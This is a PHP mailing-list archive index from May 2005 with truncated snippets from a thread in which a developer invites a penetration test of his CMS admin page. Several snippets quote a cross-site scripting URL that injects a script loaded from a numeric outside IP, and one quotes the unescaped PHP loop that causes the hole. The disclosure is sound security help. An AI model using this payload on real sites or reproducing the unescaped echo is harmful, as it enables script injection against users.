Re: [PHP] Re: Free penetration test

2005-05-30 Thread Manuel Lemos
Hello, on 05/27/2005 11:50 PM Ryan A said the following: I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could

RE: [PHP] Re: Free penetration test

2005-05-30 Thread Kim Madsen
-Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED] Sent: Saturday, May 28, 2005 3:48 PM To: Ryan A Cc: php Subject: Re: [PHP] Re: Free penetration test Ryan A wrote: That is extremely generous of you as I didn't really think you would have the time considering

RE: [PHP] Re: Free penetration test

2005-05-30 Thread Murray @ PlanetThoughtful
For me, of course there is nothing wrong on the PHP Group help themselves making money with referrals. My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with or without the

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
Hi, This is getting pretty irritating because by now even a stone would have understood what I was trying to say...so either you are playing dumb or you just don't want to understand, that said, this is my last response as I have much better things to do than say the same thing over and

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Manuel Lemos
Hello, on 05/30/2005 02:21 PM Ryan A said the following: Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35%

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
BTW, what do you call to a person that throws stones to another and then runs away to not face the consequences?! Fine, I'll play your game a little longer...but offlist as I think the list has had enough of this, I'm also a bit busy now so expect a reply from me after a few hours. Regards, Ryan

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
Hehe, well put...a few things you forgot to write: Ryan A and Rory Browne got so irritated because it's like talking to a tree... in English when the tree only understands some other language :-D that they tried to throw in the towel I was so fed up I was going to drop the whole thing because

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Rory Browne
Okay: 1: Calm down. Your sensationalism and paranoia make you look like a nutcase. (no offence) 2: That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free Obviously we don't consider it irrelevant. That's

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Ryan A
Hi, Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? I actually had the same question a little while ago and after doing some reading it left me

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Rasmus Lerdorf
Ryan A wrote: That is extremely generous of you as I didn't really think you would have the time considering the amount of projects, books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Ryan A
mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since it's mostly in Swedish? Yes, I think I can manage that. The language is pretty much irrelevant, I'm just checking for XSS

[PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Andy Pieters
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Andy Pieters wrote: On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
snip Umm, you forgot to mention that you are connected to that site and you get a commission for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list I have noticed, Jay B for

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rory Browne
On 5/27/05, Manuel Lemos [EMAIL PROTECTED] wrote: Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers.

RE: [PHP] Re: Free penetration test

2005-05-27 Thread Chris W. Parker
Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 4:15 PM said: He was apparently doing something along the lines of: foreach($_GET as $key=>$val) { echo <<<EOL <input type=hidden name=$key value=$val> EOL; } Probably just a laziness thing. Generally you will want

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Chris W. Parker wrote: One question. (Because I'm a lame brain when it comes to security as I'm not good at imagining how things can be exploited): Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'.

RE: [PHP] Re: Free penetration test

2005-05-27 Thread Chris W. Parker
Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Chris W. Parker wrote: Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Andy Pieters
On Saturday 28 May 2005 01:05, Chris W. Parker wrote: Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack:

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
Hi, I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could have given him the link to the page directly

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/27/2005 05:30 PM Rory Browne said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos
Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough,